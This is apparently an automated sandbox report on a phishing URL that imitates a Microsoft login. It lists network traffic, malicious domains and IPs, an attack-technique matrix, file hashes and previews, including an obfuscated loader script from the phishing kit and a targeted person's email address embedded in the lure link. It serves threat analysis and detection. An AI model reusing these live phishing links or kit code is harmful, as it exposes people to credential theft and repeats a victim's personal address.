html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefe
              Source: chromecache_61.2.drString found in binary or memory: https://acctcdn.msauth.net/images/clear1x1.png
              Source: chromecache_67.2.drString found in binary or memory: https://e2dpryeqzl.jappeckino.shop/m/
              Source: chromecache_76.2.drString found in binary or memory: https://mudedevidaparasempre.com.br/index5759912.htm?email=
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: classification engineClassification label: mal76.phis.win@17/42@18/8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12937315425424320999,1974519677916407761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ=="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1988,i,12937315425424320999,1974519677916407761,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Process Injection
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://bebizicon.com/Campususa/index.xml0%Avira URL Cloudsafe
              http://bebizicon.com/favicon.ico0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/script.php0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/jx/BY9284WK32TP02VZXSQRC7V0Q0%Avira URL Cloudsafe
              http://bebizicon.com/Campususa/index.xslt0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/bxg/5K2DF1C200SF89B6CKQHB2M8R0%Avira URL Cloudsafe
              https://mudedevidaparasempre.com.br/index5759912.htm?email=100%Avira URL Cloudphishing
              https://e2dpryeqzl.jappeckino.shop/m/mxl/sig_op.svg0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/sm/75R38C5T8QZBJLSXTQJJ3E2CI0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/aty/PI4BI95Y8LSRIPKOE7G9UXGHL0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/cxx/88VT2QMJSV8PY8WZL0KO3AQLQ0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1E0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y0%Avira URL Cloudsafe
              https://e2dpryeqzl.jappeckino.shop/m/ic/3T4T2XYROSS7AR2M47G6BM7KZ0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              e2dpryeqzl.jappeckino.shop
              203.161.57.139
              truefalse
                unknown
                bebizicon.com
                70.32.23.62
                truetrue
                  unknown
                  mudedevidaparasempre.com.br
                  108.167.132.194
                  truetrue
                    unknown
                    s-part-0017.t-0009.t-msedge.net
                    13.107.246.45
                    truefalse
                      high
                      www.google.com
                      216.58.206.68
                      truefalse
                        high
                        api.ipify.org
                        172.67.74.152
                        truefalse
                          high
                          aadcdn.msauthimages.net
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://bebizicon.com/favicon.icofalse
                            • Avira URL Cloud: safe
                            unknown
                            http://bebizicon.com/Campususa/index.xmltrue
                            • Avira URL Cloud: safe
                            unknown
                            https://e2dpryeqzl.jappeckino.shop/m/script.phpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://bebizicon.com/Campususa/index.xsltfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://mudedevidaparasempre.com.br/index5759912.htm?email=olivier.dozat@innocap.comfalse
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/mxl/sig_op.svgfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/bxg/5K2DF1C200SF89B6CKQHB2M8Rfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/sm/75R38C5T8QZBJLSXTQJJ3E2CIfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/jx/BY9284WK32TP02VZXSQRC7V0Qfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/cxx/88VT2QMJSV8PY8WZL0KO3AQLQfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://e2dpryeqzl.jappeckino.shop/m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Yfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.ipify.org/?format=jsonfalse
                                high
                                https://e2dpryeqzl.jappeckino.shop/m/aty/PI4BI95Y8LSRIPKOE7G9UXGHLfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://e2dpryeqzl.jappeckino.shop/m/ecpt/55X7Q2CQ1S3SJ4E3WAJ5LJG1Efalse
                                • Avira URL Cloud: safe
                                unknown
                                https://e2dpryeqzl.jappeckino.shop/m/ic/3T4T2XYROSS7AR2M47G6BM7KZfalse
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://e2dpryeqzl.jappeckino.shop/m/chromecache_67.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://mudedevidaparasempre.com.br/index5759912.htm?email=chromecache_76.2.drfalse
                                • Avira URL Cloud: phishing
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                104.26.12.205
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                203.161.57.139
                                e2dpryeqzl.jappeckino.shopMalaysia
                                45899VNPT-AS-VNVNPTCorpVNfalse
                                216.58.206.68
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                70.32.23.62
                                bebizicon.comUnited States
                                55293A2HOSTINGUStrue
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                108.167.132.194
                                mudedevidaparasempre.com.brUnited States
                                46606UNIFIEDLAYER-AS-1UStrue
                                172.67.74.152
                                api.ipify.orgUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.4
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1590467
                                Start date and time:2025-01-14 04:31:56 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 12s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:browseurl.jbs
                                Sample URL:http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal76.phis.win@17/42@18/8
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 216.58.206.67, 172.217.18.14, 142.251.5.84, 142.250.185.238, 142.250.184.238, 199.232.210.172, 142.250.185.138, 216.58.212.170, 142.250.74.202, 142.250.185.202, 142.250.184.234, 142.250.186.170, 142.250.186.42, 172.217.18.10, 216.58.206.74, 142.250.185.234, 142.250.185.74, 142.250.186.106, 142.250.185.106, 142.250.186.74, 172.217.16.202, 142.250.185.170, 184.30.131.245, 142.250.185.110, 216.58.206.78, 172.217.16.206, 142.250.184.206, 142.250.186.142, 184.28.90.27, 172.202.163.200, 13.107.246.45, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, aadcdn-msft.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn-msft.afd.azureedge.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==
                                No simulations
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                Category:dropped
                                Size (bytes):17174
                                Entropy (8bit):2.9129715116732746
                                Encrypted:false
                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                Malicious:false
                                Reputation:low
                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:dropped
                                Size (bytes):87462
                                Entropy (8bit):5.262148110388299
                                Encrypted:false
                                SSDEEP:1536:/KRUXRa8Dgwxcy2jpBNwch96SLk8Ek2BSrBGS1ia/eEk4aV2EXi8SMpQ47GKV:/u1zNwcv9qBy1HOg8SMpQ47GKV
                                MD5:E6C2415C0ACE414E5153670314CE99A9
                                SHA1:5A9EEAC34D86E92E5660E0F4F87204F1ED0C8FF6
                                SHA-256:D8F9AFBF492E4C139E9D2BCB9BA6EF7C14921EB509FB703BC7A3F911B774EFF8
                                SHA-512:DE027062931EDD07B01842EFF24FC15FDBDCAA1AF245DCD133155FABA9E0C965F0A34DC6144CE3B149BC43B4597073C792CB6DABBFC6168C63095523923BCF77
                                Malicious:false
                                Reputation:low
                                Preview:/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:downloaded
                                Size (bytes):103
                                Entropy (8bit):4.808450134624332
                                Encrypted:false
                                SSDEEP:3:vFWWMNHU8LdgCfrQjktARAd8WJBp+dey:TMVBd/rztAbSBpcf
                                MD5:328B36F3E853F18414C9D33100BFA9B1
                                SHA1:C5D11427ACD01AE1F5AAC5DC1728A4A72B2153AB
                                SHA-256:E10719ECF4042E2967B26288AF9C2AC5FB64DAC240C380E826721F22B9B6ED36
                                SHA-512:80F17CE046F77D866B9AB880E61B7FFDE0681ECE5406B1B9AA127CC2DAB6BA1D5E91325DFDFB032A67AB57E9390144ABCC1C83972BD89DF47410556F60A097F9
                                Malicious:false
                                Reputation:low
                                URL:http://bebizicon.com/Campususa/index.xml
                                Preview:<?xml version="1.0" encoding="UTF-8"?>..<?xml-stylesheet type="text/xsl" href="index.xslt"?>..<root/>..
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:downloaded
                                Size (bytes):323904
                                Entropy (8bit):5.090232862777684
                                Encrypted:false
                                SSDEEP:6144:7XIsfXgduWbHjfsXbbhrhKPyZNomDcS2aiOXimTNwPADb84LAMomBTgz8ODILZ:73ebHjEXbbnKPdmg2iOXimT59xizt+
                                MD5:3FA322DDCAC79DB5E46A9B5A30DE4D5C
                                SHA1:572748AE03B4E7C4D53BDE120FDA031FB0E58113
                                SHA-256:2D28812D8E56D0111DE0E125770899A075D2D111168991B852F8F3C2023B2327
                                SHA-512:082FC188CC5F70D2C52E44FF63A4EC9CEBCF13C462F8BDE366B75DF2BF4CDE62258803CCCF25DDBD4BB9741A1F06C0D2A92EEBDBAFDD1FF39856B3A45D316BEB
                                Malicious:false
                                Reputation:low
                                URL:https://e2dpryeqzl.jappeckino.shop/m/aty/PI4BI95Y8LSRIPKOE7G9UXGHL
                                Preview:(function(G,Y){function b2(G,Y,E,s,n){return a(n-'0xd6',G);}function b5(G,Y,E,s,n){return a(s-'0x390',Y);}function b1(G,Y,E,s,n){return a(s-0xe1,Y);}var E=G();function b3(G,Y,E,s,n){return a(E-0x304,s);}function b4(G,Y,E,s,n){return a(Y- -0x34,n);}while(!![]){try{var s=parseInt(b1('0x8c2','0x341',0x47e,'0x7f2',0x3f7))/(-0x263b*-0x1+0x37*0x1f+-0x2ce3)+-parseInt(b1(-'0xd0','0x40c','0x152','0x315','0x562'))/(0x23a7+0x14fd+0x1*-0x38a2)*(parseInt(b2(0xb71,'0x6f5','0x723','0xb56','0x8b5'))/(0x1d2a+0x18b1+-0x35d8))+parseInt(b3(0xbc1,0x467,0x7e0,'0x5fd',0x364))/(0x20*-0x121+-0x1697+-0x3abb*-0x1)*(-parseInt(b3('0x410','0x334',0x60b,'0x6a5','0x6da'))/(-0x3*-0x994+-0x1c9b+0x4*-0x7))+-parseInt(b2(0xaef,'0x88a','0x837','0x933',0x7bc))/(0x21e0*0x1+0x2*0xdb+0x2*-0x11c8)+parseInt(b3('0x78e',0xd93,'0xb3c',0xeaa,'0xa0a'))/(-0x765+-0x70f+-0xe7b*-0x1)+-parseInt(b4(0x126,0x314,0x6b2,-0x2f,0x82b))/(0xd55*0x2+0x7*-0x293+-0x89d)*(-parseInt(b5('0x99c','0xe2d',0xd2a,0xa5c,0x9a7))/(0xaf*0x8+0xc*0x13f+-0x1*0x1463
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:downloaded
                                Size (bytes):21
                                Entropy (8bit):3.594465636961452
                                Encrypted:false
                                SSDEEP:3:YMb1gXME2Y:YMeX32Y
                                MD5:909AD59B6307B0CD8BFE7961D4B98778
                                SHA1:49F8111D613317EA86C6A45CD608DC96B1C8451B
                                SHA-256:FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
                                SHA-512:8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
                                Malicious:false
                                Reputation:low
                                URL:https://api.ipify.org/?format=json
                                Preview:{"ip":"8.46.123.189"}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (567), with CRLF line terminators
                                Category:downloaded
                                Size (bytes):6341
                                Entropy (8bit):5.114798851154897
                                Encrypted:false
                                SSDEEP:48:tUcqUcFRqm1YvI7Hazo/kBRoZRKZZPcAXahBG2Jz+rx/WrICZP//:tUcqUcFkm1gI7Hazo8boZRKuA5MJ
                                MD5:FF6058356639256BF8831A9163C23D1E
                                SHA1:77470FA9FDCC214A296B75A0519E50F789C08EE0
                                SHA-256:2D0A6DCBDA10E51E78FA4BA5DA72473C28F9073B0DF7C59F7549AB55E48A94CB
                                SHA-512:1DD14258725EC9F72B6F47589599D57CF72D482B7F473C12ABDBEC2C5632BF3EA24CE62AE5B55A4BEC148824B9C5AA979F7A6CE383C6EC42C36F53789587EC97
                                Malicious:false
                                Reputation:low
                                URL:https://e2dpryeqzl.jappeckino.shop/m/cxx/88VT2QMJSV8PY8WZL0KO3AQLQ
                                Preview:*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}..*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}...form-group{margin-bottom:12px;}...c_loadingDots{line-height:0;white-space:nowrap;position:relative;visibility:hidden;}..div.c_loadingDots.c_dotsPlaying{visibility:visible;}..div.c_loadingDots div.c_loadingDot{position:absolute;left:0;bottom:0;}..div.c_loadingDots div.c_loadingFallback{position:absolute;left:0;top:0;width:100%;height:100%;background:transparent url('https://acctcdn.msauth.net/images/clear1x1.png') no-repeat center center;opacity:1;filter:alpha(opacity=100);-moz-animation:hidedotsfallback .3s linear .1s 1 normal;-ms-animation:hidedotsfallback .3s linear 0s 1 normal;-webkit-animation:hidedotsfallback .3s linear 0s 1 normal;animation:hidedotsfallback .3s linear 0s 1 normal;-moz-animation-fill-mode:both;-ms-animation-fill-mode:both;-webkit-animation-fill-mode:both;animation-fill-mode:both;}..d
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:downloaded
                                Size (bytes):3651
                                Entropy (8bit):4.094801914706141
                                Encrypted:false
                                SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                Malicious:false
                                Reputation:low
                                URL:https://e2dpryeqzl.jappeckino.shop/m/mxl/mlg.svg?YLV3I8GJ5WHA39OEO3BQ2J34Y
                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:SVG Scalable Vector Graphics image
                                Category:downloaded
                                Size (bytes):1592
